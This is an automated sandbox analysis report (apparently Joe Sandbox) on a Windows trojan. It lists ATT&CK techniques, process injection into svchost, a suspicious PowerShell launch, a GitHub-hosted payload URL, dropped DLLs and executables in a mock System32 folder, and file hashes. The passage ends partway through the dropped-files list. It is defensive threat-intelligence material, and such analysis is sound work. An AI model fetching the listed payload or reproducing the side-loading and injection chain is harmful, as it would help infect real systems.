    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: 0_2_00007FF733AA8050 GetSystemTimeAsFileTime,0_2_00007FF733AA8050

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		412
    Process Injection    		121
    Masquerading    		OS Credential Dumping1
    System Time Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    PowerShell    		Boot or Logon Initialization Scripts1
    Abuse Elevation Control Mechanism    		21
    Virtualization/Sandbox Evasion    		LSASS Memory11
    Security Software Discovery    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		412
    Process Injection    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput Capture13
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Abuse Elevation Control Mechanism    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
    Obfuscated Files or Information    		Cached Domain Credentials1
    File and Directory Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Software Packing    		DCSync12
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1503230 Sample: SecuriteInfo.com.Trojan.Inj... Startdate: 03/09/2024 Architecture: WINDOWS Score: 100 36 raw.githubusercontent.com 2->36 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected Powershell decode and execute 2->46 48 4 other signatures 2->48 10 SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe 2->10         started        signatures3 process4 signatures5 56 Hijacks the control flow in another process 10->56 58 Writes to foreign memory regions 10->58 60 Allocates memory in foreign processes 10->60 62 2 other signatures 10->62 13 svchost.exe 10->13 injected process6 signatures7 64 Suspicious command line found 13->64 16 cmd.exe 1 13->16         started        process8 signatures9 40 Suspicious powershell command line found 16->40 19 powershell.exe 14 21 16->19         started        24 conhost.exe 16->24         started        process10 dnsIp11 38 raw.githubusercontent.com 185.199.110.133, 443, 49727 FASTLYUS Netherlands 19->38 30 C:\Windows \System32\printui.dll (copy), PE32+ 19->30 dropped 32 C:\Users\user\AppData\Roaming\pyld.dll, PE32+ 19->32 dropped 34 C:\Windows \System32\printui.exe, PE32+ 19->34 dropped 50 Drops executables to the windows directory (C:\Windows) and starts them 19->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 19->52 54 Powershell drops PE file 19->54 26 printui.exe 1 19->26         started        28 printui.exe 19->28         started        file12 signatures13 process14

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe42%ReversingLabsWin64.Trojan.Generic
    SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe37%VirustotalBrowse

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Windows \System32\printui.exe0%ReversingLabs
    C:\Windows \System32\printui.exe0%VirustotalBrowse

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    raw.githubusercontent.com0%VirustotalBrowse
    fp2e7a.wpc.phicdn.net0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    http://nuget.org/NuGet.exe0%URL Reputationsafe
    https://login.windows.net0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://xsts.auth.xboxlive.com0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://login.windows.local/0%URL Reputationsafe
    https://login.windows.local0%URL Reputationsafe
    https://login.windows.net/0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://nuget.org/nuget.exe0%URL Reputationsafe
    https://aka.ms/pscore680%URL Reputationsafe
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.dat0%Avira URL Cloudsafe
    http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
    https://activity.windows.comt0%Avira URL Cloudsafe
    https://assets.activity.windows.com/v1/assets0%Avira URL Cloudsafe
    https://%s.xboxlive.comable0%Avira URL Cloudsafe
    https://%s.xboxlive.com0%Avira URL Cloudsafe
    https://github.com/Pester/Pester0%Avira URL Cloudsafe
    https://assets.activity.windows.comsc60%Avira URL Cloudsafe
    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
    https://assets.activity.windows.com/v1/assets0%VirustotalBrowse
    https://raw.githubusercontent.com0%Avira URL Cloudsafe
    https://assets.activity.windows.com0%Avira URL Cloudsafe
    https://github.com/Pester/Pester1%VirustotalBrowse
    https://activity.windows.com0%Avira URL Cloudsafe
    https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.dat1%VirustotalBrowse
    https://raw.githubusercontent.com1%VirustotalBrowse
    https://assets.activity.windows.com/v1/assets/$batch0%Avira URL Cloudsafe
    https://%s.dnet.xboxlive.com0%Avira URL Cloudsafe
    https://assets.activity.windows.com0%VirustotalBrowse
    https://xsts.auth.xboxlive.com/0%Avira URL Cloudsafe
    https://activity.windows.com0%VirustotalBrowse
    https://assets.activity.windows.com/v1/assets/$batch0%VirustotalBrowse
    https://xsts.auth.xboxlive.com/0%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    raw.githubusercontent.com
    		185.199.110.133
    		truefalseunknown
    fp2e7a.wpc.phicdn.net
    		192.229.221.95
    		truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://raw.githubusercontent.com/panchitopistolesx/items/main/usvcusb.datfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.3357572970.0000022910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://login.windows.netsvchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://assets.activity.windows.com/v1/assetssvchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://xsts.auth.xboxlive.comsvchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://contoso.com/Licensepowershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://contoso.com/Iconpowershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://%s.xboxlive.comablesvchost.exe, 00000002.00000000.2239181782.0000020857A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427453677.0000020857A65000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://activity.windows.comtsvchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://%s.xboxlive.comsvchost.exe, 00000002.00000002.3427453677.0000020857A65000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://login.windows.local/svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://login.windows.localsvchost.exe, 00000002.00000000.2239205123.0000020857A8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427486616.0000020857A8F000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://assets.activity.windows.comsc6svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://login.windows.net/svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://raw.githubusercontent.compowershell.exe, 00000005.00000002.3329958642.0000022900221000.00000004.00000800.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://contoso.com/powershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.3357572970.0000022910071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3357572970.00000229101B4000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://assets.activity.windows.comsvchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://aka.ms/pscore68powershell.exe, 00000005.00000002.3329958642.0000022900001000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.3329958642.0000022900001000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://activity.windows.comsvchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://assets.activity.windows.com/v1/assets/$batchsvchost.exe, 00000002.00000000.2239161001.0000020857A44000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427414911.0000020857A44000.00000004.00000001.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://%s.dnet.xboxlive.comsvchost.exe, 00000002.00000000.2239181782.0000020857A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427453677.0000020857A65000.00000004.00000001.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://xsts.auth.xboxlive.com/svchost.exe, 00000002.00000000.2239241454.0000020857AAF000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427550032.0000020857AAF000.00000004.00000001.00020000.00000000.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    185.199.110.133
    		raw.githubusercontent.comNetherlands
    		54113FASTLYUSfalse

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1503230
    Start date and time:2024-09-03 08:29:16 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 6m 16s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:10
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:2
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe
    Detection:MAL
    Classification:mal100.evad.winEXE@9/7@1/1
    EGA Information:
    • Successful, ratio: 50%
    HCA Information:
    • Successful, ratio: 98%
    • Number of executed functions: 13
    • Number of non-executed functions: 195
    Cookbook Comments:
    • Found application associated with file extension: .exe

    Warnings

    • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target powershell.exe, PID 6656 because it is empty
    • Execution Graph export aborted for target printui.exe, PID 6692 because there are no executed function
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtWriteVirtualMemory calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    02:30:28API Interceptor63x Sleep call for process: powershell.exe modified
    02:31:33API Interceptor1979x Sleep call for process: conhost.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    185.199.110.133Run First.exeGet hashmaliciousUnknownBrowse
      https://jbiel.juniferkel.com/7dPYZLDD/Get hashmaliciousHTMLPhisherBrowse
        soinjector.exeGet hashmaliciousUnknownBrowse
          trSK2fqPeB.exeGet hashmaliciousAmadey, RedLine, XWorm, XmrigBrowse
            https://jwx.iountanic.com/4rGra/Get hashmaliciousUnknownBrowse
              https://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0Get hashmaliciousHTMLPhisherBrowse
                PDF To Excel Converter.exeGet hashmaliciousLummaC, MicroClipBrowse
                  phish_alert_iocp_v1.4.48 (43).emlGet hashmaliciousHTMLPhisherBrowse
                    https://fb1f1d-d3.myshopify.com/pages/fb1f1d-d3-scanning#0YnJhbmRpLnRyeW9uQGFjYWRlbWljcGFydG5lcnNoaXBzLmNvbQ0=Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                      https://oh3y.ulvantiro.su/82xG/Get hashmaliciousHTMLPhisherBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        raw.githubusercontent.comIf it doesn't work, run this.exeGet hashmaliciousXmrigBrowse
                        • 185.199.111.133
                        SecuriteInfo.com.Trojan.GenericKD.73909637.10756.30300.exeGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        SecuriteInfo.com.Trojan.GenericKD.73909637.10756.30300.exeGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        iqA8j9yGcd.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                        • 185.199.108.133
                        Run First.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        Run First.exeGet hashmaliciousUnknownBrowse
                        • 185.199.111.133
                        soinjector.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        snhNDcl7l4.exeGet hashmaliciousLummaCBrowse
                        • 185.199.111.133
                        file.exeGet hashmaliciousLummaCBrowse
                        • 185.199.108.133
                        http://interface-git-main-uniswap.vercel.app/Get hashmaliciousUnknownBrowse
                        • 185.199.109.133
                        fp2e7a.wpc.phicdn.nethttps://piclut.com/n//?c3Y9bzM2NV8xX29uZSZyYW5kPWRHcFdjMk09JnVpZD1VU0VSMjkwNzIwMjRVMTgwNzI5MDA=Get hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        IrisQuentin530Victor.exeGet hashmaliciousRedLineBrowse
                        • 192.229.221.95
                        http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        Book_0256103.vbeGet hashmaliciousAgentTeslaBrowse
                        • 192.229.221.95
                        https://altanks.com.au/Get hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        http://pub-8580081af55240e892c6b1ee029c6c6f.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        https://shore-alkaline-canvas.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                        • 192.229.221.95
                        https://feji.us/y8jp4pGet hashmaliciousUnknownBrowse
                        • 192.229.221.95
                        https://datr.pages.dev/help/contact/729322717779148Get hashmaliciousHTMLPhisherBrowse
                        • 192.229.221.95
                        https://ggu-lop.vercel.app/Get hashmaliciousUnknownBrowse
                        • 192.229.221.95

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        FASTLYUSIf it doesn't work, run this.exeGet hashmaliciousXmrigBrowse
                        • 185.199.111.133
                        http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                        • 151.101.2.132
                        https://drivespacee.slickplan.com/pmympv0/content/svgxia03qvqu1bahbet?language=en_USGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.194.137
                        http://pub-8580081af55240e892c6b1ee029c6c6f.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 185.199.110.153
                        https://shore-alkaline-canvas.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                        • 199.232.198.27
                        https://src-assistanceclient.com/robots.txtGet hashmaliciousUnknownBrowse
                        • 151.101.1.229
                        http://pub-0047294bc4284f259967ae2863532e97.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                        • 185.199.110.153
                        https://sso--coinbasepro---login--auth.webflow.io/Get hashmaliciousUnknownBrowse
                        • 151.101.1.229
                        https://secure---page--coinbase-walet--sso.webflow.io/Get hashmaliciousUnknownBrowse
                        • 151.101.2.188
                        https://responsibility0.glitch.me/public/.style.htmlGet hashmaliciousHTMLPhisherBrowse
                        • 151.101.130.27

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eSOCRETAS GRAECIA VSL's PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                        • 185.199.110.133
                        PO 4555131028.exeGet hashmaliciousAgentTeslaBrowse
                        • 185.199.110.133
                        SecuriteInfo.com.Win32.PWSX-gen.14960.5907.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 185.199.110.133
                        avanss.exeGet hashmaliciousAgentTeslaBrowse
                        • 185.199.110.133
                        nxdgJVWkzl.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        5t47sm4uW3.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        nxdgJVWkzl.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        5t47sm4uW3.exeGet hashmaliciousUnknownBrowse
                        • 185.199.110.133
                        umbralstealer.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                        • 185.199.110.133
                        BTC.exeGet hashmaliciousAsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWormBrowse
                        • 185.199.110.133

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Windows \System32\printui.exeF.7zGet hashmaliciousUnknownBrowse
                          Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9434
                            Entropy (8bit):4.928515784730612
                            Encrypted:false
                            SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                            MD5:D3594118838EF8580975DDA877E44DEB
                            SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                            SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                            SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllultnxj:NllU
                            MD5:F93358E626551B46E6ED5A0A9D29BD51
                            SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                            SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                            SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:@...e................................................@..........

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j54wpmxq.yzl.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvk5jeoe.pf2.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Roaming\pyld.dll

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):94168896
                            Entropy (8bit):7.999979498033118
                            Encrypted:true
                            SSDEEP:1572864:EiVVfuvJH7Y23ceID4BMS6YI8G9BXhJJklGSDvhbU0udwB1y6jqm2ze9yf5JdH:EWZ6bzR6HS6YI8G9DJJMZbU0uKryDvfR
                            MD5:6676B47DA47049E97EA06C7A83D1969A
                            SHA1:8F111371E4EAC87AD4EDC4B18A749D6CDA4D9F18
                            SHA-256:B16FA296FC4211D5443068181DC30C4F5A23B868752566DEE88FE57561BB1D14
                            SHA-512:25AE4B9D27B83DC9C1B440816B9FF8660A6B79442C668271C4646E1648E2FED2F51029AF55FA9A0C61239487E7BF6865A7FD8286EFA5FA62098A21744E2C9609
                            Malicious:true
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d... ..f.j..w%....& ...'.z......... ..........E.............................@......X.....`... .........................................^.... ..(................:...........`..............................`i..(...................|$...............................text....x.......z..................`..`.data...............................@....rdata..............................@..@.pdata...:.......<...d..............@..@.xdata..(4.......6..................@..@.bss....0................................edata..^..........................@..@.idata..(.... .....................@....CRT....`....@.....................@....tls.........P.....................@....reloc.......`.....................@..B/4...........p......................@..B/19....."G.......H..................@..B/31.....~...........>..............@..B/45.................H..............@..B/57.....

                            C:\Windows \System32\printui.dll (copy)

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                            Category:dropped
